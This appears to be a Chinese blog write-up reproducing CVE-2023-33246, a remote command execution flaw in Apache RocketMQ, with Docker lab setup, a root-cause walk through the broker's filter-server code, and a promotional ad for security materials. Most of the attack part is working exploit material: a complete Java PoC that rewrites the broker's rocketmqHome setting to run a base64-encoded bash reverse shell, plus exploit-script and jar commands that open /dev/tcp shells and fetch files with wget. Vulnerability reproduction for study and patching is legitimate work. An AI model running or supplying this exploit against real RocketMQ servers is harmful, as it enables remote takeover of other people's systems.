首页 > 其他分享 >CVE-2023-33246命令执行复现分析

CVE-2023-33246命令执行复现分析

时间:2023-06-19 15:57:06浏览次数:48  
标签:33246 String admin DefaultMQAdminExt 2023 apache org CVE rocketmq

RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力,同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。

影响版本

<=RocketMQ 5.1.0

<=RocketMQ 4.9.5

环境搭建

docker pull apache/rocketmq:4.9.4

image-20230605153453593

root@ubuntu:/home/ubuntu/Desktop# docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv      //起nameserver

创建broker.conf,并且修改配置文件内容

image-20230615155042723

root@ubuntu:/home/ubuntu/Desktop# docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf    //起Broker

image-20230608173548843

docker ps

image-20230608173815060

http://127.0.0.1:10912/

image-20230608173919660

python3 check.py --ip 10.10.14.72 --port 9876

image-20230612101500792

python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py 10.10.14.72 10911 wget  10.10.14.162:8666/1.txt

image-20230612125101859

使用vulhub直接搭建可能效果好一点儿,否则,不知道为什么在漏洞利用执行上面命令的时候无回显,可能exp的问题

【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

cd vulhub/rocketmq/CVE-2023-33246
docker-compose up -d

POC如下

import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;
​
import java.util.Base64;
import java.util.Properties;
​
public class poc {
    private static String getCmd(String ip, String port) {
        String cmd = "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1";
        String cmdBase = Base64.getEncoder().encodeToString(cmd.getBytes());
        return "-c $@|sh . echo echo \"" + cmdBase + "\"|base64 -d|bash -i;";
    }
​
    public static void main(String[] args) throws Exception {
        String targetHost = "目的IP";
        String targetPort = "10911";
    
        String shellHost = "VPSIP";
        String shellPort = "Listen-port";
    
        String targetAddr = String.format("%s:%s",targetHost,targetPort);
        Properties props = new Properties();
        props.setProperty("rocketmqHome", getCmd(shellHost,shellPort));
        props.setProperty("filterServerNums", "1");
        // 创建 DefaultMQAdminExt 对象并启动
        DefaultMQAdminExt admin = new DefaultMQAdminExt();
​
//        admin.setNamesrvAddr("0.0.0.0:12345");
        admin.start();
        // 更新配置⽂件
        admin.updateBrokerConfig(targetAddr, props);
        Properties brokerConfig = admin.getBrokerConfig(targetAddr);
        System.out.println(brokerConfig.getProperty("rocketmqHome"));
        System.out.println(brokerConfig.getProperty("filterServerNums"));
        // 关闭 DefaultMQAdminExt 对象
        admin.shutdown();
    }
}

使用IDEA创建maven项目,创建xml文件下载依赖,下载地址

https://mvnrepository.com/artifact/org.apache.rocketmq/rocketmq-tools/4.9.4

image-20230615100244421

<!-- https://mvnrepository.com/artifact/org.apache.rocketmq/rocketmq-tools -->
<dependency>
    <groupId>org.apache.rocketmq</groupId>
    <artifactId>rocketmq-tools</artifactId>
    <version>4.9.4</version>
</dependency>

image-20230615103757592

修改POC

import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;
​
import java.util.Base64;
import java.util.Properties;
​
public class poc {
    private static String getCmd(String ip, String port) {
        String cmd = "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1";
        String cmdBase = Base64.getEncoder().encodeToString(cmd.getBytes());
        return "-c $@|sh . echo echo \"" + cmdBase + "\"|base64 -d|bash -i;";
    }
​
    public static void main(String[] args) throws Exception {
        String targetHost = "10.10.14.72";
        String targetPort = "10911";
    
        String shellHost = "10.10.14.72";
        String shellPort = "65532";
    
        String targetAddr = String.format("%s:%s",targetHost,targetPort);
        Properties props = new Properties();
        props.setProperty("rocketmqHome", getCmd(shellHost,shellPort));
        props.setProperty("filterServerNums", "1");
        // 创建 DefaultMQAdminExt 对象并启动
        DefaultMQAdminExt admin = new DefaultMQAdminExt();
​
//        admin.setNamesrvAddr("0.0.0.0:12345");
        admin.start();
        // 更新配置⽂件
        admin.updateBrokerConfig(targetAddr, props);
        Properties brokerConfig = admin.getBrokerConfig(targetAddr);
        System.out.println(brokerConfig.getProperty("rocketmqHome"));
        System.out.println(brokerConfig.getProperty("filterServerNums"));
        // 关闭 DefaultMQAdminExt 对象
        admin.shutdown();
    }
}

反弹结果

image-20230615115733747

git clone https://github.com/SuperZero/CVE-2023-33246.git
java -jar CVE-2023-33246.jar -ip "127.0.0.1:10911" -cmd "222 >/root/2.txt"

image-20230615153715566

进入容器,查看根部录下文件是已写入

image-20230615153833934

java -jar CVE-2023-33246.jar -ip "127.0.0.1:10911" -cmd "bash -i >& /dev/tcp/10.10.14.72/65532 0>&1"

反弹shell

image-20230615162234961

漏洞分析

启动broker路由如下:

main:50, BrokerStartup (org.apache.rocketmq.broker)
start:55, BrokerStartup (org.apache.rocketmq.broker) 
start:1570, BrokerController (org.apache.rocketmq.broker) 
startBasicService:1527, BrokerController (org.apache.rocketmq.broker) 
start:57, FilterServerManager (org.apache.rocketmq.broker.filtersrv)

当在函数org.apache.rocketmq.broker.filtersrv.FilterServerManager61行

image-20230616102658128

调用下面的createFilterServer方法,71行中看到从配置文件中获取参数。72行调用方法buildStartCommand

image-20230616105316243

该方法中取到变量NamesrvAddr和 RocketmqHome,获取之后进行拼接cmd,在72行拿到拼接后的cmd

image-20230616105415604

进入for循环后在org.apache.rocketmq.broker.filtersrv.FilterServerUtil中给的callshell方法去执行命令

image-20230616105538500

该中间件本来就是每30秒执行一次,漏洞产生的就是修改了配置文件,变量被赋值为了恶意命令,导致了命令执行。

image-20230616105824880

更多网安技能的在线实操练习,请点击这里>>

 

标签:33246,String,admin,DefaultMQAdminExt,2023,apache,org,CVE,rocketmq
From: https://www.cnblogs.com/hetianlab/p/17491323.html

相关文章

  • 数据库管理软件-DataGrip 2023 mac/win版
    DataGrip2023是由JetBrains开发的一款全功能数据库管理工具。它旨在提供一个集成的开发环境,方便开发人员管理和操作各种类型的数据库。DataGrip2023支持多种数据库系统,包括MySQL、PostgreSQL、Oracle、SQLServer等。它具有直观的用户界面,使用户能够轻松地连接到数据库服务器,并......
  • 大数据,信息与智能工程国际会议(BDIIE2023)
    2023年大数据、信息与智能工程国际会议(BDIIE2023)将于2023年9月17-18日在中国武汉举行。BDIIE2023 将以高质量的技术和体验计划为特色,在论文展示和备受瞩目的主题演讲中处理传统和当代的热门话题。我们诚邀您提交与大数据、信息工程和智能工程相关的所有主题的论文和摘要,期待您......
  • 【Android面试】2023最新面试专题一:HashMap篇
    1、请说一说HashMap,SparseArrary原理,SparseArrary相比HashMap的优点、ConcurrentHashMap如何实现线程安全?这道题想考察什么?1、HashMap,SparseArrary基础原理?2、SparseArrary相比HashMap的优点是什么?3、ConcurrentHashMap如何实现线程安全?考察的知识点HashMap,SparseArrary、Concurre......
  • 2023年Flutter开发前景如何,能找到工作吗?
    引言Flutter自诞生之日起,从来都稳坐风口浪尖,关注与争议一直伴随其身。学习一门技术的时候大家最关心的就是发展前景怎么样,学习Flutter的朋友也不例外,那就让我们一起来看看2023年Flutter开发前景到底怎么样吧。Flutter开发前景从上图的数据可以看出,虽然Flutter开发岗位的招聘在减......
  • 2023-06-19 API `getMenuButtonBoundingClientRect` is not yet implemented
    前言:想使用该Api来获取设备导航栏高度,结果报错了:API`getMenuButtonBoundingClientRect`isnotyetimplemented尚未实现API`getMenuButtonBoundingClientRect`原因:该Api不支持在app端或者h5端使用。平台兼容如下: AppH5微信小程序支付宝小程序百度小程序抖音小程序飞书小......
  • 2023跳槽涨薪必看,Android面试经验分享,附经典题库+答案解析
    过完年就是金三银四,跳槽旺季了,如今疫情管控放开,就业形势或会有所回暖,也会有更多的Android开发岗位逐渐释出。近期,也有很多同学问我关于Android技术岗位招聘的事,希望能提前准备一下,好冲击大厂、拿到高薪。博主作为首批Android开发者,十余年深耕Android及移动互联网开发领域,有丰富的面......
  • 2023-06-19《计算方法》- 陈丽娟 - 方程的近似解法(注解)
    2023-06-19《计算方法》-陈丽娟-方程的近似解法(注解)Matlab计算方法二分法迭代法牛顿法前面介绍了求解方程的二分法、迭代法和牛顿迭代法,这里介绍弦截法,欸特金加速法。一、弦截法由于牛顿迭代法需要计算导数,而从上一章节我们看到导数的求解对数值稳定性会产生不良影响,为了......
  • 20230308 java.util.ArrayList
    简介java.util.ArrayListList接口的可调整大小的数组实现。源码中对数组的操作非常精彩,值得学习数组一旦初始化长度就不可以发生改变数组结构特点增删慢:每次删除元素,都需要更改数组长度、拷贝以及移动元素位置。查询快:由于数组在内存中是一块连续空间,因此可以根据地址......
  • LeetCode 周赛 350(2023/06/18)01 背包变型题
    本文已收录到AndroidFamily,技术和职场问题,请关注公众号[彭旭锐]和[BaguTreePro]知识星球提问。往期回顾:LeetCode单周赛第348场·数位DP模版学会了吗?T1.总行驶距离(Easy)标签:模拟T2.找出分区值(Medium)标签:排序T3.特别的排列(Medium)标签:图、状态压缩、......
  • 【Android面试】2023最新面试专题五:Java深入泛型与注解
    1泛型是什么,泛型擦除呢?详细讲解享学课堂移动互联网系统课程:架构师筑基必备技能《架构设计中必不可少的泛型-Java泛型的定义与原理》这道题想考察什么?泛型考察的知识点泛型的特点和优缺点以及泛型擦除考生应该如何回答泛型就是一种就是一种不确定的数据类型。在Java中有着重要的地......